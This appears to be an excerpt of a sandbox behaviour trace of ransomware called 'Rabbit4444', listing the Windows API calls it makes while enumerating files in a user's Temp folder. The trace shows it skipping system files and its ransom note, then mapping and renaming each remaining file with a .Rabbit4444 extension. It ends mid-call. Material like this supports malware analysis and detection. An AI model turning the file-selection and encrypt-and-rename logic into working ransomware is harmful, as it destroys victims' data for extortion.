[0055.558] lstrlenW (lpString="Rabbit4444") returned 10 [0055.558] lstrcmpiW (lpString1="lW9yY5.flv", lpString2="Rabbit4444") returned -1 [0055.558] lstrlenW (lpString=".dll") returned 4 [0055.558] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0055.558] lstrlenW (lpString=".lnk") returned 4 [0055.558] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0055.558] lstrlenW (lpString=".ini") returned 4 [0055.558] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0055.558] lstrlenW (lpString=".sys") returned 4 [0055.558] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0055.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\5s306805lW9yY5.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\5s306805lw9yy5.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.558] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.558] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14686916023) returned 1 [0055.558] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5810) returned 1 [0055.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0055.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0055.559] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x19c0, lpName=0x0) returned 0x298 [0055.559] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19c0) returned 0x70000 [0055.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0055.559] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0055.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.559] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0055.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0055.560] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14687033547) returned 1 [0055.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0055.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0055.560] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.560] CloseHandle (hObject=0x298) returned 1 [0055.560] CloseHandle (hObject=0x278) returned 1 [0055.560] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\5s306805lW9yY5.flv.Rabbit4444") returned 64 [0055.560] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\5s306805lW9yY5.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\5s306805lw9yy5.flv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\5s306805lW9yY5.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\5s306805lw9yy5.flv.rabbit4444"), dwFlags=0x1) returned 1 [0055.565] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2ee8b30, ftCreationTime.dwHighDateTime=0x1d4c595, ftLastAccessTime.dwLowDateTime=0x62543570, ftLastAccessTime.dwHighDateTime=0x1d4c71a, ftLastWriteTime.dwLowDateTime=0x62543570, ftLastWriteTime.dwHighDateTime=0x1d4c71a, nFileSizeHigh=0x0, nFileSizeLow=0x85fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6U1EDzYg-f9jWV81ksXS.mp3", cAlternateFileName="6U1EDZ~1.MP3")) returned 1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2="Rabbit4444.exe") returned -1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2=".") returned 1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2="..") returned 1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2="windows") returned -1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2="bootmgr") returned -1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2="pagefile.sys") returned -1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2="boot") returned -1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2="ids.txt") returned -1 [0055.565] lstrcmpiW (lpString1="6U1EDzYg-f9jWV81ksXS.mp3", lpString2="NTUSER.DAT") returned -1 [0055.565] lstrcpyW (in: lpString1=0x130eb7e, lpString2="6U1EDzYg-f9jWV81ksXS.mp3" | out: lpString1="6U1EDzYg-f9jWV81ksXS.mp3") returned="6U1EDzYg-f9jWV81ksXS.mp3" [0055.565] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\6U1EDzYg-f9jWV81ksXS.mp3", dwFileAttributes=0x0) returned 1 [0055.565] lstrlenW (lpString="6U1EDzYg-f9jWV81ksXS.mp3") returned 24 [0055.565] lstrlenW (lpString="Rabbit4444") returned 10 [0055.565] lstrcmpiW (lpString1="81ksXS.mp3", lpString2="Rabbit4444") returned -1 [0055.565] lstrlenW (lpString=".dll") returned 4 [0055.566] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0055.566] lstrlenW (lpString=".lnk") returned 4 [0055.566] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0055.566] lstrlenW (lpString=".ini") returned 4 [0055.566] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0055.566] lstrlenW (lpString=".sys") returned 4 [0055.566] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0055.566] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\6U1EDzYg-f9jWV81ksXS.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\6u1edzyg-f9jwv81ksxs.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.566] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.566] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14687669924) returned 1 [0055.566] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=34301) returned 1 [0055.566] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0055.566] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0055.566] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8900, lpName=0x0) returned 0x298 [0055.566] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8900) returned 0x70000 [0055.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0055.567] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0055.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0055.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0055.568] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14687846255) returned 1 [0055.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0055.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0055.568] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.568] CloseHandle (hObject=0x298) returned 1 [0055.568] CloseHandle (hObject=0x278) returned 1 [0055.570] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\6U1EDzYg-f9jWV81ksXS.mp3.Rabbit4444") returned 70 [0055.570] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\6U1EDzYg-f9jWV81ksXS.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\6u1edzyg-f9jwv81ksxs.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\6U1EDzYg-f9jWV81ksXS.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\6u1edzyg-f9jwv81ksxs.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0055.571] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d574040, ftCreationTime.dwHighDateTime=0x1d4c8af, ftLastAccessTime.dwLowDateTime=0xdf119540, ftLastAccessTime.dwHighDateTime=0x1d4c95d, ftLastWriteTime.dwLowDateTime=0xdf119540, ftLastWriteTime.dwHighDateTime=0x1d4c95d, nFileSizeHigh=0x0, nFileSizeLow=0x902c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8XHXvCH-33.ppt", cAlternateFileName="8XHXVC~1.PPT")) returned 1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2="Rabbit4444.exe") returned -1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2=".") returned 1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2="..") returned 1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2="windows") returned -1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2="bootmgr") returned -1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2="pagefile.sys") returned -1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2="boot") returned -1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2="ids.txt") returned -1 [0055.571] lstrcmpiW (lpString1="8XHXvCH-33.ppt", lpString2="NTUSER.DAT") returned -1 [0055.571] lstrcpyW (in: lpString1=0x130eb7e, lpString2="8XHXvCH-33.ppt" | out: lpString1="8XHXvCH-33.ppt") returned="8XHXvCH-33.ppt" [0055.571] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\8XHXvCH-33.ppt", dwFileAttributes=0x0) returned 1 [0055.571] lstrlenW (lpString="8XHXvCH-33.ppt") returned 14 [0055.571] lstrlenW (lpString="Rabbit4444") returned 10 [0055.571] lstrcmpiW (lpString1="vCH-33.ppt", lpString2="Rabbit4444") returned 1 [0055.571] lstrlenW (lpString=".dll") returned 4 [0055.571] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.571] lstrlenW (lpString=".lnk") returned 4 [0055.571] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0055.571] lstrlenW (lpString=".ini") returned 4 [0055.571] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0055.571] lstrlenW (lpString=".sys") returned 4 [0055.571] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0055.571] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\8XHXvCH-33.ppt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8xhxvch-33.ppt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.572] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.572] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14688237094) returned 1 [0055.572] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=36908) returned 1 [0055.572] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0055.572] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0055.572] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9330, lpName=0x0) returned 0x298 [0055.572] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9330) returned 0x70000 [0055.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0055.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0055.573] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0055.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0055.573] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14688419130) returned 1 [0055.573] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0055.574] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0055.574] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.574] CloseHandle (hObject=0x298) returned 1 [0055.574] CloseHandle (hObject=0x278) returned 1 [0055.575] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\8XHXvCH-33.ppt.Rabbit4444") returned 60 [0055.575] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\8XHXvCH-33.ppt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8xhxvch-33.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\8XHXvCH-33.ppt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8xhxvch-33.ppt.rabbit4444"), dwFlags=0x1) returned 1 [0055.575] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf452cf0, ftCreationTime.dwHighDateTime=0x1d4c979, ftLastAccessTime.dwLowDateTime=0x7b309c70, ftLastAccessTime.dwHighDateTime=0x1d4cfc4, ftLastWriteTime.dwLowDateTime=0x7b309c70, ftLastWriteTime.dwHighDateTime=0x1d4cfc4, nFileSizeHigh=0x0, nFileSizeLow=0xfaf7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9Fw4yFdueVF2 gt-.jpg", cAlternateFileName="9FW4YF~1.JPG")) returned 1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2="Rabbit4444.exe") returned -1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2=".") returned 1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2="..") returned 1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2="windows") returned -1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2="bootmgr") returned -1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2="pagefile.sys") returned -1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2="boot") returned -1 [0055.575] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2="ids.txt") returned -1 [0055.576] lstrcmpiW (lpString1="9Fw4yFdueVF2 gt-.jpg", lpString2="NTUSER.DAT") returned -1 [0055.576] lstrcpyW (in: lpString1=0x130eb7e, lpString2="9Fw4yFdueVF2 gt-.jpg" | out: lpString1="9Fw4yFdueVF2 gt-.jpg") returned="9Fw4yFdueVF2 gt-.jpg" [0055.576] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9Fw4yFdueVF2 gt-.jpg", dwFileAttributes=0x0) returned 1 [0055.576] lstrlenW (lpString="9Fw4yFdueVF2 gt-.jpg") returned 20 [0055.576] lstrlenW (lpString="Rabbit4444") returned 10 [0055.576] lstrcmpiW (lpString1="F2 gt-.jpg", lpString2="Rabbit4444") returned -1 [0055.576] lstrlenW (lpString=".dll") returned 4 [0055.576] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.576] lstrlenW (lpString=".lnk") returned 4 [0055.576] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0055.576] lstrlenW (lpString=".ini") returned 4 [0055.576] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0055.576] lstrlenW (lpString=".sys") returned 4 [0055.576] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0055.576] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9Fw4yFdueVF2 gt-.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9fw4yfduevf2 gt-.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.576] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.576] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14688700059) returned 1 [0055.576] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=64247) returned 1 [0055.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0055.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0055.576] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfe00, lpName=0x0) returned 0x298 [0055.577] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfe00) returned 0x70000 [0055.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0055.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0055.578] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0055.578] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0055.579] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14688932613) returned 1 [0055.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0055.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0055.579] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.579] CloseHandle (hObject=0x298) returned 1 [0055.579] CloseHandle (hObject=0x278) returned 1 [0055.580] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9Fw4yFdueVF2 gt-.jpg.Rabbit4444") returned 66 [0055.580] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9Fw4yFdueVF2 gt-.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9fw4yfduevf2 gt-.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9Fw4yFdueVF2 gt-.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9fw4yfduevf2 gt-.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0055.581] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d1f95f0, ftCreationTime.dwHighDateTime=0x1d4d2bd, ftLastAccessTime.dwLowDateTime=0x6f401180, ftLastAccessTime.dwHighDateTime=0x1d4c69a, ftLastWriteTime.dwLowDateTime=0x6f401180, ftLastWriteTime.dwHighDateTime=0x1d4c69a, nFileSizeHigh=0x0, nFileSizeLow=0xa3a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a1awP8HsB2PYwBF.jpg", cAlternateFileName="A1AWP8~1.JPG")) returned 1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2="Rabbit4444.exe") returned -1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2=".") returned 1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2="..") returned 1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2="windows") returned -1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2="bootmgr") returned -1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2="pagefile.sys") returned -1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2="boot") returned -1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2="ids.txt") returned -1 [0055.581] lstrcmpiW (lpString1="a1awP8HsB2PYwBF.jpg", lpString2="NTUSER.DAT") returned -1 [0055.581] lstrcpyW (in: lpString1=0x130eb7e, lpString2="a1awP8HsB2PYwBF.jpg" | out: lpString1="a1awP8HsB2PYwBF.jpg") returned="a1awP8HsB2PYwBF.jpg" [0055.581] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\a1awP8HsB2PYwBF.jpg", dwFileAttributes=0x0) returned 1 [0055.581] lstrlenW (lpString="a1awP8HsB2PYwBF.jpg") returned 19 [0055.581] lstrlenW (lpString="Rabbit4444") returned 10 [0055.581] lstrcmpiW (lpString1="2PYwBF.jpg", lpString2="Rabbit4444") returned -1 [0055.581] lstrlenW (lpString=".dll") returned 4 [0055.581] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.581] lstrlenW (lpString=".lnk") returned 4 [0055.581] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0055.581] lstrlenW (lpString=".ini") returned 4 [0055.581] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0055.581] lstrlenW (lpString=".sys") returned 4 [0055.581] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0055.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\a1awP8HsB2PYwBF.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\a1awp8hsb2pywbf.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.582] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.582] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14689244713) returned 1 [0055.582] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=41893) returned 1 [0055.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0055.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0055.582] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa6b0, lpName=0x0) returned 0x298 [0055.582] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa6b0) returned 0x70000 [0055.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0055.583] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0055.583] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: 